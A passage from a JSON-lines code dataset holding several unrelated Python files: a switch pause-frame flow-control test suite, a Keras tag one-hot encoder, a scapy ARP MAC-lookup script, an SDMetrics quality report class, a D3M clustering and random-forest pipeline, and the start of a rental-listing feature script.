frame_rate * ptime\n delay_sent = (sweeper_p * 100.) / 1000000000\n delay_received = 100 - delay_sent\n expected_rate = (full_rate * delay_received) / 100\n if expected_rate <= 0:\n expected_rate = 0\n if not actual_rate - expected_rate == 0:\n return False\n else:\n return True\n else:\n if abs(actual_rate - expected_rate) <= 10:\n return True\n else:\n return False\n\n def full_rate(self, sw_instance=None, tested_port=None, frame_size=None):\n \"\"\"\n @brief Calculation of full line rate for tested ports.\n @param sw_instance: switch instance\n @type sw_instance: SwitchGeneral\n @param tested_port: switch port ID\n @type tested_port: int\n @param frame_size: frame size\n @type frame_size: int\n @rtype: int\n @return: full line rate\n \"\"\"\n speed_value = sw_instance.ui.get_table_ports([tested_port], True)[0]['speed']\n full_line_rate = (speed_value * 1000000.) / ((frame_size + 20) / 8)\n return full_line_rate\n\n# Test Cases\n @pytest.mark.skip(\"Pypacker does not support Pause frames\")\n def test_sent_pause_frames(self, env):\n \"\"\"\n @brief Verify that device doesn't flood received pause frames when flow control mode is configured.\n @steps\n -# Configure FlowControl on switch ports.\n -# Send PFC frames to the switch.\n -# Verify PFC frames are not flooded.\n @endsteps\n \"\"\"\n # Define active ports\n ports = env.get_ports([['tg1', 'sw1', 3], ])\n\n # Disable all ports and enabling only necessary ones:\n helpers.set_all_ports_admin_disabled(env.switch)\n helpers.set_ports_admin_enabled(env.switch, ports)\n\n # Wait until ports will be in forwarding state.\n helpers.wait_until_stp_state(switch_instance=env.switch[1], mode=\"RSTP\",\n state=\"Forwarding\",\n port=ports[('sw1', 'tg1')][1],\n timeout=120)\n helpers.wait_until_stp_state(switch_instance=env.switch[1], mode=\"RSTP\",\n state=\"Forwarding\",\n port=ports[('sw1', 'tg1')][2],\n timeout=120)\n helpers.wait_until_stp_state(switch_instance=env.switch[1], mode=\"RSTP\",\n state=\"Forwarding\",\n port=ports[('sw1', 'tg1')][3],\n timeout=120)\n\n # Configure stream of pause frame.\n pause_frame = ({\"Ethernet\": {\"dst\": \"01:80:C2:00:00:01\",\n \"src\": \"00:00:00:00:01:44\",\n \"type\": 0x8808}},\n {\"Pause\": {\"opcode\": 0x0001, \"ptime\": 1}})\n stream = env.tg[1].set_stream(pause_frame,\n count=10,\n iface=ports[('tg1', 'sw1')][1])\n\n sniff_ports = list(ports[('tg1', 'sw1')].values())\n\n # Configure flow control values for all active ports.\n env.switch[1].ui.set_flow_control_type([ports[('sw1', 'tg1')][1],\n ports[('sw1', 'tg1')][2],\n ports[('sw1', 'tg1')][3]],\n control_type='RxTx')\n\n # Start capture\n env.tg[1].start_sniff(sniff_ports, sniffing_time=5)\n # Send pause frame from the TG port 1.\n env.tg[1].send_stream(stream)\n\n data = env.tg[1].stop_sniff(sniff_ports)\n helpers.print_sniffed_data_brief(data)\n # Verify that Pause Frames are not forwarded from tested ports.\n params = ({'layer': \"Ethernet\",\n 'field': \"dst\",\n 'value': \"01:80:C2:00:00:01\".lower()}, )\n assert len(helpers.get_packet_from_the_port(sniff_port=sniff_ports[0],\n params=params,\n sniff_data=data,\n tg=env.tg[1])) == 0, \\\n \"Pause Frames are forwarded from port 1 when PF traffic is sent\"\n assert len(helpers.get_packet_from_the_port(sniff_port=sniff_ports[1],\n params=params,\n sniff_data=data,\n tg=env.tg[1])) == 0, \\\n \"Pause Frames are forwarded from port 2 when PF traffic is sent\"\n assert len(helpers.get_packet_from_the_port(sniff_port=sniff_ports[2],\n params=params,\n sniff_data=data,\n tg=env.tg[1])) == 0, \\\n \"Pause Frames are forwarded from port 3 when PF traffic is sent\"\n\n @pytest.mark.skip(\"Pypacker does not support Pause frames\")\n def test_rxtx_flow_control(self, env):\n \"\"\"\n @brief Verify that \"RxTx\" flow control manages traffic correctly.\n @steps\n -# Configure FlowControl on switch ports in 'RxTx' mode.\n -# Send stream of unicast packets with 50% rate to the port 1.\n -# Send stream of unicast packets with 50% rate to the port 2.\n -# Send PFC frames to the port 3.\n -# Verify that line rate on TG port 3 decreases after pause frames with middle quanta are sending\n @endsteps\n \"\"\"\n self.suite_logger.info(\"Define variables for test execution\")\n pause_frame_rate = 30\n quanta_value = 4096\n\n # Define active ports\n ports = env.get_ports([['tg1', 'sw1', 3], ])\n\n # Disable all ports and enabling only necessary ones:\n helpers.set_all_ports_admin_disabled(env.switch)\n helpers.set_ports_admin_enabled(env.switch, ports)\n\n # Wait until ports will be in forwarding state.\n helpers.wait_until_stp_state(switch_instance=env.switch[1], mode=\"RSTP\",\n state=\"Forwarding\",\n port=ports[('sw1', 'tg1')][1],\n timeout=120)\n helpers.wait_until_stp_state(switch_instance=env.switch[1], mode=\"RSTP\",\n state=\"Forwarding\",\n port=ports[('sw1', 'tg1')][2],\n timeout=120)\n helpers.wait_until_stp_state(switch_instance=env.switch[1], mode=\"RSTP\",\n state=\"Forwarding\",\n port=ports[('sw1', 'tg1')][3],\n timeout=120)\n\n # Configure two streams of unicast packets.\n packet_1 = ({\"Ethernet\": {\"dst\": \"00:00:00:00:00:33\",\n \"src\": \"00:00:00:00:00:11\",\n \"type\": 0x0800}},\n {\"IP\": {}})\n packet_2 = ({\"Ethernet\": {\"dst\": \"00:00:00:00:00:33\",\n \"src\": \"00:00:00:00:00:22\",\n \"type\": 0x0800}},\n {\"IP\": {}})\n stream_1 = env.tg[1].set_stream(packet_1,\n iface=ports[('tg1', 'sw1')][1],\n rate=50,\n continuous=True)\n stream_2 = env.tg[1].set_stream(packet_2,\n iface=ports[('tg1', 'sw1')][2],\n rate=50,\n continuous=True)\n\n sniff_ports = list(ports[('tg1', 'sw1')].values())\n\n # Configure flow control values for all active ports.\n env.switch[1].ui.set_flow_control_type([ports[('sw1', 'tg1')][1],\n ports[('sw1', 'tg1')][2],\n ports[('sw1', 'tg1')][3]],\n control_type='RxTx')\n\n # Enable Flow Control on TG port 1 and port 2\n env.tg[1].set_flow_control(ports[('tg1', 'sw1')][1], True)\n env.tg[1].set_flow_control(ports[('tg1', 'sw1')][2], True)\n\n # Send stream of unicast packets from TG port 1.\n env.tg[1].start_streams([stream_1, stream_2, ])\n time.sleep(3)\n\n # Configure stream of pause frames\n pause_frame = ({\"Ethernet\": {\"dst\": \"01:80:C2:00:00:01\",\n \"src\": \"00:00:00:00:01:44\",\n \"type\": 0x8808}},\n {\"Pause\": {\"opcode\": 0x0001,\n \"ptime\": quanta_value}})\n stream = env.tg[1].set_stream(pause_frame,\n iface=ports[('tg1', 'sw1')][3],\n rate=pause_frame_rate,\n continuous=True)\n\n # Send stream of pause frames from TG port 2.\n env.tg[1].start_streams([stream, ])\n time.sleep(3)\n\n self.suite_logger.debug(\"Start sniffer for detecting pause frames\")\n env.tg[1].start_sniff(sniff_ports, sniffing_time=5, filter_layer='PAUSE')\n time.sleep(5)\n\n # Define transmit rate limits on TG port 1 and port 2 after sending pause frames to \"RxTx\" flow control port.\n tx_test_rate1 = env.tg[1].get_port_txrate(ports[('tg1', 'sw1')][1])\n tx_test_rate2 = env.tg[1].get_port_txrate(ports[('tg1', 'sw1')][2])\n # Define receive rate limit on TG port 3 after sending pause frames to \"RxTx\" flow control port.\n rx_test_rate3 = env.tg[1].get_port_rxrate(ports[('tg1', 'sw1')][3])\n\n self.suite_logger.debug(\"Stop sniffer\")\n data = env.tg[1].stop_sniff(sniff_ports)\n # Stop streams of unicast packets and pause frames.\n env.tg[1].stop_streams([stream_1, stream_2, stream, ])\n\n # Verify that pause frames are not forwarded from tested ports.\n params = ({'layer': \"Ethernet\", 'field': \"src\", 'value': \"00:00:00:00:01:44\"}, )\n assert len(helpers.get_packet_from_the_port(sniff_port=sniff_ports[0],\n params=params,\n sniff_data=data,\n tg=env.tg[1])) == 0, \\\n \"Pause Frames are forwarded from port 1 when 'RxTx' is configured on all tested ports.\"\n assert len(helpers.get_packet_from_the_port(sniff_port=sniff_ports[1],\n params=params,\n sniff_data=data,\n tg=env.tg[1])) == 0, \\\n \"Pause Frames are forwarded from port 2 when 'RxTx' is configured on all tested ports.\"\n assert len(helpers.get_packet_from_the_port(sniff_port=sniff_ports[2],\n params=params,\n sniff_data=data,\n tg=env.tg[1])) == 0, \\\n \"Pause Frames are forwarded from port 3 when 'RxTx' is configured on all tested ports.\"\n\n # Verify that line rate on TG port 3 decreases after pause frames with middle quanta are sending.\n if self.rate_decreasing(pf_rate=pause_frame_rate,\n quanta=quanta_value,\n pause_frame_size=64,\n full_rate=self.full_rate(sw_instance=env.switch[1],\n tested_port=ports[('sw1', 'tg1')][3],\n frame_size=64),\n actual_rate=rx_test_rate3):\n self.suite_logger.debug(\"Line rate decreases properly when stream of pause frames with middle quanta is sent to 'RxTx' port.\")\n else:\n pytest.fail(\"Line rate is not decreased properly when stream of pause frames with middle quanta is sent to 'RxTx' port.\")\n\n # Verify that transmit line rate on TG port 1 is decreased according to configured \"RxTx\" flow control on all tested ports.\n if not abs(tx_test_rate1 - (rx_test_rate3 // 2)) <= rx_test_rate3 // 2 * 101 // 100:\n pytest.fail(\"Transmit line rate is not decreased accordingly to detected overflow on 'RxTx' egress port.\")\n\n # Verify that transmit line rate on TG port 2 is decreased according to configured \"RxTx\" flow control on all tested ports.\n if not abs(tx_test_rate2 - (rx_test_rate3 // 2)) <= rx_test_rate3 / 2 * 101 // 100:\n pytest.fail(\"Transmit line rate is not decreased accordingly to detected overflow on 'RxTx' egress port.\")\n","sub_path":"l2/pause_frames/test_pfc_samples.py","file_name":"test_pfc_samples.py","file_ext":"py","file_size_in_byte":15147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"206305969","text":"import pickle\nimport json\nimport numpy as np\nfrom keras.utils import to_categorical\n\nfrom keras.preprocessing.text import Tokenizer\n\nhair_tags = ['orange hair', 'white hair', 'aqua hair', 'gray hair',\n 'green hair', 'red hair', 'purple hair', 'pink hair',\n 'blue hair', 'black hair', 'brown hair', 'blonde hair']\n\neyes_tags = ['gray eyes', 'black eyes', 'orange eyes',\n 'pink eyes', 'yellow eyes', 'aqua eyes', 'purple eyes',\n 'green eyes', 'brown eyes', 'red eyes', 'blue eyes']\n\nnum_classes = len(hair_tags) + len(eyes_tags) + 1\n\ntokenizer = Tokenizer(num_words=num_classes,\n filters='!\"#$%&()*+,-./:;<=>?@[\\]^`{|}~\\t\\n',\n lower=True, split=',', char_level=False)\n\ntokenizer.fit_on_texts(hair_tags + eyes_tags)\n\nwith open('tokenizer.pickle', 'wb') as handle:\n pickle.dump(tokenizer, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\nprint(tokenizer.word_index)\nprint(tokenizer.word_counts)\n\ny_tags = []\nwith open('tags_clean.csv', 'r') as f:\n for line in f.readlines():\n line = line.strip('\\n')\n n, tags = line.split(',')\n\n if int(n) != len(y_tags):\n print('index error at line %d: %s' % (len(y_tags), line))\n exit(0)\n else:\n text = ','.join([tag.split(':')[0].rstrip(' ') for tag in tags.rstrip('\\t').split('\\t')])\n y_tags.append(text)\n\n# json.dump(y_tags, open('y_tags_onehot.txt', 'w'), separators=(',\\n', ':'))\n\n\ndef tags_to_onehot(tags):\n seqs = tokenizer.texts_to_sequences(tags)\n return np.array([np.sum(to_categorical(seq, num_classes), axis=-2) for seq in seqs])\n\ny_onehot = tags_to_onehot(y_tags)\n\nprint(y_onehot[:20])\n\nnp.save('y_onehot.npy', y_onehot)\n\nnp.save('hair_onehot.npy', tags_to_onehot(hair_tags))\nnp.save('eyes_onehot.npy', tags_to_onehot(eyes_tags))\n\neyes_hair_tags = ['%s,%s' % (eyes_tag, hair_tag) for eyes_tag in eyes_tags for hair_tag in hair_tags]\neyes_hair_onehot = tags_to_onehot(eyes_hair_tags)\n\nnp.save('eyes_hair_onehot.npy', eyes_hair_onehot)\n","sub_path":"hw4/process_label_onehot.py","file_name":"process_label_onehot.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"105653857","text":"#!/usr/bin/env python3\n# -*- encoding = utf-8 -*-\n# 该代码由本人学习时编写,仅供自娱自乐!\n# 本人QQ:1945962391 \n# 欢迎留言讨论,共同学习进步!\n\n\nfrom netifaces import interfaces, ifaddresses, AF_INET, AF_INET6\nfrom scapy.layers.l2 import ARP\nfrom scapy.sendrecv import sr1\nimport netifaces as ni\nimport platform\nimport netifaces\nimport time\n\n\ndef get_connection_name_from_guid(iface_guids): # 获取接口名称\n if platform.system() == \"Windows\":\n import winreg as wr\n # 产生接口名字清单,默认全部填写上'(unknown)'\n iface_names = ['(unknown)' for i in range(len(iface_guids))]\n # 打开\"HKEY_LOCAL_MACHINE\"\n reg = wr.ConnectRegistry(None, wr.HKEY_LOCAL_MACHINE)\n # 打开r'SYSTEM\\CurrentControlSet\\Control\\Network\\{4d36e972-e325-11ce-bfc1-08002be10318}'\n #\n reg_key = wr.OpenKey(reg, r'SYSTEM\\CurrentControlSet\\Control\\Network\\{4d36e972-e325-11ce-bfc1-08002be10318}')\n for i in range(len(iface_guids)):\n try:\n # 尝试读取每一个接口ID下对应的Name\n reg_subkey = wr.OpenKey(reg_key, iface_guids[i] + r'\\Connection')\n # 如果存在Name,就按照顺序写入iface_names\n iface_names[i] = wr.QueryValueEx(reg_subkey, 'Name')[0]\n except FileNotFoundError:\n pass\n # 把iface_guids, iface_names 压在一起返回\n return zip(iface_guids, iface_names)\n\n\ndef get_ifname(ifname):\n if platform.system() == \"Linux\":\n return ifname\n elif platform.system() == \"Windows\":\n import winreg as wr\n x = ni.interfaces()\n for i in get_connection_name_from_guid(x):\n # 找到名字所对应的接口ID并返回\n if i[1] == ifname:\n return i[0]\n else:\n print('操作系统不支持,本脚本只能工作在Windows或者Linux环境!')\n\n\ndef get_mac_address(ifname): # 获取接口MAC地址\n return netifaces.ifaddresses(get_ifname(ifname))[netifaces.AF_LINK][0]['addr']\n\n\ndef get_ip_address(ifname): # 获取接口ip地址\n return ifaddresses(get_ifname(ifname))[AF_INET][0]['addr']\n\n\ndef get_ipv6_address(ifname): # 获取接口ipv6地址\n return ifaddresses(get_ifname(ifname))[AF_INET6][0]['addr']\n\n\ndef arp_request(dst, ifname): # 构建arp请求函数\n hwsrc = get_mac_address(ifname)\n psrc = get_ip_address(ifname)\n try:\n arp_pkt = sr1(ARP(op=1, hwsrc=hwsrc, psrc=psrc, pdst=dst), timeout=5, verbose=False)\n return dst, arp_pkt.getlayer(ARP).fields['hwsrc']\n except AttributeError:\n return dst, None\n\n\nif __name__ == '__main__':\n hostname = input('请输入需要请求的目的IP地址:')\n iface = input('请输入本机网卡接口名称:')\n print('正在请求', hostname, '的MAC地址,请稍等!')\n time.sleep(2)\n arp_result = arp_request(hostname, iface)\n if arp_result[1] is not None:\n print('请求结果如下:')\n print('主机:', arp_result[0], 'MAC地址为:', arp_result[1])\n else:\n print('请求失败。请确保网络可达!')\n\n\n","sub_path":"ARP/ARP_Request_new.py","file_name":"ARP_Request_new.py","file_ext":"py","file_size_in_byte":3152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"154796669","text":"\"\"\"Multi table quality report.\"\"\"\n\nimport pickle\nimport sys\nimport warnings\n\nimport numpy as np\nimport pandas as pd\nimport pkg_resources\nimport tqdm\n\nfrom sdmetrics.reports.multi_table._properties import Cardinality, ColumnPairTrends, ColumnShapes\nfrom sdmetrics.reports.utils import validate_multi_table_inputs\n\n\nclass QualityReport():\n \"\"\"Multi table quality report.\n\n This class creates a quality report for multi-table data. It calculates the quality\n score along three properties - Column Shapes, Column Pair Trends, and Cardinality.\n \"\"\"\n\n def __init__(self):\n self._tables = []\n self._overall_quality_score = None\n self._properties_instances = {}\n self._properties_scores = {}\n self._is_generated = False\n self._package_version = None\n self._property_errors = {}\n\n def _print_results(self, out=sys.stdout):\n \"\"\"Print the quality report results.\"\"\"\n if pd.isna(self._overall_quality_score) & any(self._property_errors.values()):\n out.write('\\nOverall Quality Score: Error computing report.\\n\\n')\n else:\n out.write(\n f'\\nOverall Quality Score: {round(self._overall_quality_score * 100, 2)}%\\n\\n')\n\n out.write('Properties:\\n')\n\n for property_name, score in self._properties_scores.items():\n if not pd.isna(score):\n out.write(f'{property_name}: {round(score * 100, 2)}%\\n')\n elif property_name in self._property_errors:\n out.write(f'{property_name}: Error computing property.\\n')\n else:\n out.write(f'{property_name}: NaN\\n')\n\n def generate(self, real_data, synthetic_data, metadata, verbose=True):\n \"\"\"Generate report.\n\n Args:\n real_data (pandas.DataFrame):\n The real data.\n synthetic_data (pandas.DataFrame):\n The synthetic data.\n metadata (dict):\n The metadata, which contains each column's data type as well as relationships.\n verbose (bool):\n Whether or not to print the report summary and progress.\n \"\"\"\n validate_multi_table_inputs(real_data, synthetic_data, metadata)\n\n self._tables = list(real_data.keys())\n\n self._properties_instances = {\n 'Column Shapes': ColumnShapes(),\n 'Column Pair Trends': ColumnPairTrends(),\n 'Cardinality': Cardinality()\n }\n\n if verbose:\n sys.stdout.write('Generating report ...\\n')\n\n num_columns = [len(table['columns']) for table in metadata['tables'].values()]\n num_properties = len(self._properties_instances)\n progress_bar = None\n for index, property_tuple in enumerate(self._properties_instances.items()):\n property_name, property_instance = property_tuple\n if verbose:\n if property_name == 'Column Shapes':\n num_iterations = sum(num_columns)\n elif property_name == 'Column Pair Trends':\n # for each table, the number of combinations of pairs of columns is\n # n * (n - 1) / 2, where n is the number of columns in the table\n num_iterations = sum([(n_cols * (n_cols - 1)) // 2 for n_cols in num_columns])\n elif property_name == 'Cardinality':\n num_iterations = len(metadata['relationships'])\n\n progress_bar = tqdm.tqdm(total=num_iterations, file=sys.stdout)\n progress_bar.set_description(\n f'({index + 1}/{num_properties}) Evaluating {property_name}: ')\n\n try:\n self._properties_scores[property_name] = property_instance.get_score(\n real_data, synthetic_data, metadata, progress_bar)\n except BaseException:\n self._properties_scores[property_name] = np.nan\n self._property_errors[property_name] = True\n\n if verbose:\n progress_bar.close()\n\n scores = list(self._properties_scores.values())\n self._overall_quality_score = np.nanmean(scores)\n self._is_generated = True\n\n if verbose:\n self._print_results(sys.stdout)\n\n def _validate_generated(self):\n if not self._is_generated:\n raise ValueError(\n \"The report has not been generated yet. Please call the 'generate' method.\")\n\n def get_score(self):\n \"\"\"Return the overall quality score.\n\n Returns:\n float\n The overall quality score.\n \"\"\"\n self._validate_generated()\n\n return self._overall_quality_score\n\n def get_properties(self):\n \"\"\"Return the score for each property.\n\n Returns:\n pandas.DataFrame\n The score for each property.\n \"\"\"\n self._validate_generated()\n\n return pd.DataFrame({\n 'Property': self._properties_scores.keys(),\n 'Score': self._properties_scores.values(),\n })\n\n def _validate_inputs(self, property_name, table_name):\n self._validate_generated()\n\n valid_properties = list(self._properties_instances.keys())\n if property_name not in valid_properties:\n raise ValueError(\n f\"Invalid property name ('{property_name}'). \"\n f'It must be one of {valid_properties}.'\n )\n\n if (table_name is not None) and (table_name not in self._tables):\n raise ValueError(f\"Unknown table ('{table_name}'). Must be one of {self._tables}.\")\n\n def _validate_visualization(self, property_name, table_name):\n self._validate_inputs(property_name, table_name)\n if property_name in ['Column Shapes', 'Column Pair Trends'] and table_name is None:\n raise ValueError('Table name must be provided when viewing details for '\n f\"property '{property_name}'.\")\n\n def get_visualization(self, property_name, table_name=None):\n \"\"\"Return a visualization for each score for the given property and table.\n\n Args:\n property_name (str):\n The name of the property to return score details for.\n table_name (str):\n The table to show scores for. Must be provided for 'Column Shapes'\n and 'Column Pair Trends'.\n\n Returns:\n plotly.graph_objects._figure.Figure\n A visualization of the requested property's scores.\n \"\"\"\n self._validate_visualization(property_name, table_name)\n\n return self._properties_instances[property_name].get_visualization(table_name)\n\n def _get_details_non_cardinality(self, property_instance, table_name):\n if table_name:\n details = {table_name: property_instance._properties[table_name]._details.copy()}\n else:\n details = {\n table_name: property_._details\n for table_name, property_ in property_instance._properties.items()\n }\n\n # Add a column with the table name for each details\n for table_name in details:\n table_column = pd.DataFrame({'Table': [table_name] * len(details[table_name])})\n details[table_name] = pd.concat([table_column, details[table_name]], axis=1)\n\n return pd.concat(list(details.values()), ignore_index=True)\n\n def _get_details_cardinality(self, property_instance, table_name):\n # For Cardinality, the details are a dictionary where the keys are tuples (table1, table2).\n # If table_name is passed, select only the tuples which contain it.\n details = property_instance._details\n if table_name:\n details = {\n table_names: detail\n for table_names, detail in details.items()\n if table_name in table_names\n }\n\n details_dataframe = pd.DataFrame()\n for tables, scores in details.items():\n new_row = pd.DataFrame({\n 'Child Table': [tables[0]],\n 'Parent Table': [tables[1]],\n 'Metric': ['CardinalityShapeSimilariy'],\n 'Score': [scores['score']]\n })\n details_dataframe = pd.concat([details_dataframe, new_row], ignore_index=True)\n\n return details_dataframe\n\n def get_details(self, property_name, table_name=None):\n \"\"\"Return the details for each score for the given property name.\n\n Args:\n property_name (str):\n The name of the property to return score details for.\n table_name (str):\n Optionally filter results by table.\n\n Returns:\n pd.DataFrame:\n The details of the scores of a property.\n \"\"\"\n self._validate_inputs(property_name, table_name)\n\n property_instance = self._properties_instances[property_name]\n if property_name != 'Cardinality':\n return self._get_details_non_cardinality(property_instance, table_name)\n else:\n return self._get_details_cardinality(property_instance, table_name)\n\n def save(self, filepath):\n \"\"\"Save this report instance to the given path using pickle.\n\n Args:\n filepath (str):\n The path to the file where the report instance will be serialized.\n \"\"\"\n self._package_version = pkg_resources.get_distribution('sdmetrics').version\n\n with open(filepath, 'wb') as output:\n pickle.dump(self, output)\n\n @classmethod\n def load(cls, filepath):\n \"\"\"Load a ``QualityReport`` instance from a given path.\n\n Args:\n filepath (str):\n The path to the file where the report is stored.\n\n Returns:\n QualityReort:\n The loaded quality report instance.\n \"\"\"\n current_version = pkg_resources.get_distribution('sdmetrics').version\n\n with open(filepath, 'rb') as f:\n report = pickle.load(f)\n if current_version != report._package_version:\n warnings.warn(\n f'The report was created using SDMetrics version `{report._package_version}` '\n f'but you are currently using version `{current_version}`. '\n 'Some features may not work as intended.')\n\n return report\n","sub_path":"sdmetrics/reports/multi_table/quality_report.py","file_name":"quality_report.py","file_ext":"py","file_size_in_byte":10417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"120063772","text":"from typing import Optional\n\nfrom common_primitives.simple_profiler import SimpleProfilerPrimitive\nfrom d3m import index\nfrom d3m.metadata.base import ArgumentType\nfrom d3m.metadata.pipeline import Pipeline, PrimitiveStep, Resolver\nfrom d3m.primitives.data_cleaning.column_type_profiler import Simon\n\n\ndef create_pipeline(\n metric: str,\n n_jobs: int = -1,\n resolver: Optional[Resolver] = None,\n exclude_column=None,\n profiler=\"simple\",\n) -> Pipeline:\n\n # Creating pipeline\n input_val = \"steps.{}.produce\"\n pipeline_description = Pipeline()\n pipeline_description.add_input(name=\"inputs\")\n tune_steps = []\n\n # Step 0: Denormalize primitive -> put all resources in one dataframe\n step_0 = PrimitiveStep(\n primitive=index.get_primitive(\n \"d3m.primitives.data_transformation.denormalize.Common\"\n )\n )\n step_0.add_argument(\n name=\"inputs\", argument_type=ArgumentType.CONTAINER, data_reference=\"inputs.0\"\n )\n step_0.add_output(\"produce\")\n pipeline_description.add_step(step_0)\n previous_step = 0\n\n # Step 1: dataset_to_dataframe\n step_1 = PrimitiveStep(\n primitive=index.get_primitive(\n \"d3m.primitives.data_transformation.dataset_to_dataframe.Common\"\n )\n )\n step_1.add_argument(\n name=\"inputs\",\n argument_type=ArgumentType.CONTAINER,\n data_reference=input_val.format(previous_step),\n )\n step_1.add_output(\"produce\")\n pipeline_description.add_step(step_1)\n previous_step += 1\n\n # run profiler\n if profiler == \"simon\":\n step = PrimitiveStep(\n primitive_description=Simon.metadata.query(), resolver=resolver\n )\n step.add_argument(\n name=\"inputs\",\n argument_type=ArgumentType.CONTAINER,\n data_reference=input_val.format(previous_step),\n )\n step.add_output(\"produce\")\n pipeline_description.add_step(step)\n previous_step += 1\n else:\n step = PrimitiveStep(\n primitive_description=SimpleProfilerPrimitive.metadata.query(),\n resolver=resolver,\n )\n step.add_argument(\n name=\"inputs\",\n argument_type=ArgumentType.CONTAINER,\n data_reference=input_val.format(previous_step),\n )\n step.add_output(\"produce\")\n pipeline_description.add_step(step)\n previous_step += 1\n\n # Step 2 column parser -> labeled semantic types to data types\n step_2 = PrimitiveStep(\n primitive=index.get_primitive(\n \"d3m.primitives.data_transformation.column_parser.Common\"\n )\n )\n step_2.add_argument(\n name=\"inputs\",\n argument_type=ArgumentType.CONTAINER,\n data_reference=input_val.format(previous_step),\n )\n step_2.add_hyperparameter(\n name=\"exclude_columns\",\n argument_type=ArgumentType.VALUE,\n data=[exclude_column],\n )\n step_2.add_output(\"produce\")\n pipeline_description.add_step(step_2)\n previous_step += 1\n\n # Step 3: imputer -> imputes null values based on mean of column\n step_3 = PrimitiveStep(\n primitive=index.get_primitive(\"d3m.primitives.data_cleaning.imputer.SKlearn\")\n )\n step_3.add_argument(\n name=\"inputs\",\n argument_type=ArgumentType.CONTAINER,\n data_reference=input_val.format(previous_step),\n )\n step_3.add_hyperparameter(\n name=\"return_result\", argument_type=ArgumentType.VALUE, data=\"replace\"\n )\n step_3.add_hyperparameter(\n name=\"use_semantic_types\", argument_type=ArgumentType.VALUE, data=True\n )\n step_3.add_hyperparameter(\n name=\"exclude_columns\",\n argument_type=ArgumentType.VALUE,\n data=[exclude_column],\n )\n step_3.add_output(\"produce\")\n pipeline_description.add_step(step_3)\n previous_step += 1\n\n # Step 4: DISTIL/NK Hdbscan primitive -> unsupervised clustering of records with a label\n step_4 = PrimitiveStep(\n primitive=index.get_primitive(\"d3m.primitives.clustering.hdbscan.Hdbscan\")\n )\n step_4.add_argument(\n name=\"inputs\",\n argument_type=ArgumentType.CONTAINER,\n data_reference=input_val.format(previous_step),\n )\n step_4.add_hyperparameter(\n name=\"cluster_selection_method\", argument_type=ArgumentType.VALUE, data=\"leaf\"\n )\n step_4.add_output(\"produce\")\n pipeline_description.add_step(step_4)\n previous_step += 1\n clustering_step = previous_step\n tune_steps.append(previous_step)\n\n # Step 5: extract feature columns\n step_5 = PrimitiveStep(\n primitive=index.get_primitive(\n \"d3m.primitives.data_transformation.extract_columns_by_semantic_types.Common\"\n )\n )\n step_5.add_argument(\n name=\"inputs\",\n argument_type=ArgumentType.CONTAINER,\n data_reference=input_val.format(clustering_step),\n )\n step_5.add_output(\"produce\")\n pipeline_description.add_step(step_5)\n previous_step += 1\n feature_step = previous_step\n # Step 6: extract target columns\n step_6 = PrimitiveStep(\n primitive=index.get_primitive(\n \"d3m.primitives.data_transformation.extract_columns_by_semantic_types.Common\"\n )\n )\n step_6.add_argument(\n name=\"inputs\",\n argument_type=ArgumentType.CONTAINER,\n data_reference=input_val.format(clustering_step),\n )\n step_6.add_hyperparameter(\n name=\"semantic_types\",\n argument_type=ArgumentType.VALUE,\n data=(\"https://metadata.datadrivendiscovery.org/types/Target\",),\n )\n step_6.add_output(\"produce\")\n pipeline_description.add_step(step_6)\n previous_step += 1\n target_step = previous_step\n\n # Step 7: Random forest\n step_7 = PrimitiveStep(\n primitive=index.get_primitive(\n \"d3m.primitives.learner.random_forest.DistilEnsembleForest\"\n )\n )\n step_7.add_argument(\n name=\"inputs\",\n argument_type=ArgumentType.CONTAINER,\n data_reference=input_val.format(feature_step),\n )\n step_7.add_argument(\n name=\"outputs\",\n argument_type=ArgumentType.CONTAINER,\n data_reference=input_val.format(target_step),\n )\n step_7.add_hyperparameter(\"metric\", ArgumentType.VALUE, metric)\n step_7.add_hyperparameter(\"n_jobs\", ArgumentType.VALUE, n_jobs)\n step_7.add_hyperparameter(\"grid_search\", ArgumentType.VALUE, True)\n step_7.add_output(\"produce\")\n pipeline_description.add_step(step_7)\n previous_step += 1\n tune_steps.append(previous_step)\n\n # Step 8: construct predictions dataframe in proper format\n step_8 = PrimitiveStep(\n primitive=index.get_primitive(\n \"d3m.primitives.data_transformation.construct_predictions.Common\"\n )\n )\n step_8.add_argument(\n name=\"inputs\",\n argument_type=ArgumentType.CONTAINER,\n data_reference=input_val.format(previous_step),\n )\n step_8.add_argument(\n name=\"reference\",\n argument_type=ArgumentType.CONTAINER,\n data_reference=input_val.format(clustering_step),\n )\n step_8.add_output(\"produce\")\n pipeline_description.add_step(step_8)\n previous_step += 1\n\n # Final Output\n pipeline_description.add_output(\n name=\"output predictions\", data_reference=input_val.format(previous_step)\n )\n return (pipeline_description, [])\n","sub_path":"processing/pipelines/semisupervised_tabular.py","file_name":"semisupervised_tabular.py","file_ext":"py","file_size_in_byte":7344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"441490847","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Apr 3 00:06:18 2017\r\n\r\n@author: Mike\r\n\"\"\"\r\n\r\nimport numpy as np \r\nimport pandas as pd\r\n\r\ntrain_df = pd.read_json(open(\"train.json\", \"r\"))\r\ntest_df = pd.read_json(open(\"test.json\", \"r\"))\r\n\r\n#print(train_df.tail())\r\n\r\n\r\n# see the frequency of each feature\r\nimport collections\r\ndef most_common(lst):\r\n features = collections.Counter(lst)\r\n feature_value = features.keys()\r\n frequency = features.values()\r\n data = [('feature_value', feature_value),\r\n ('frequency', frequency),] \r\n df = pd.DataFrame.from_items(data)\r\n return df.sort_values(by = 'frequency', ascending = False)\r\n\r\n\r\ndef newColumn(name,df,series):\r\n feature = pd.Series(0,df.index,name = name)# data : 0\r\n for row,word in enumerate(series):\r\n if name in word:\r\n feature.iloc[row] = 1\r\n df[name] = feature # feature : series ; value in series : 1 or 0\r\n return df\r\n\r\n# select features based on frequency\r\nfacilities = ['Elevator','Cats Allowed','Hardwood Floors','Dogs Allowed','Doorman','Dishwasher','No Fee','Laundry in Building','Fitness 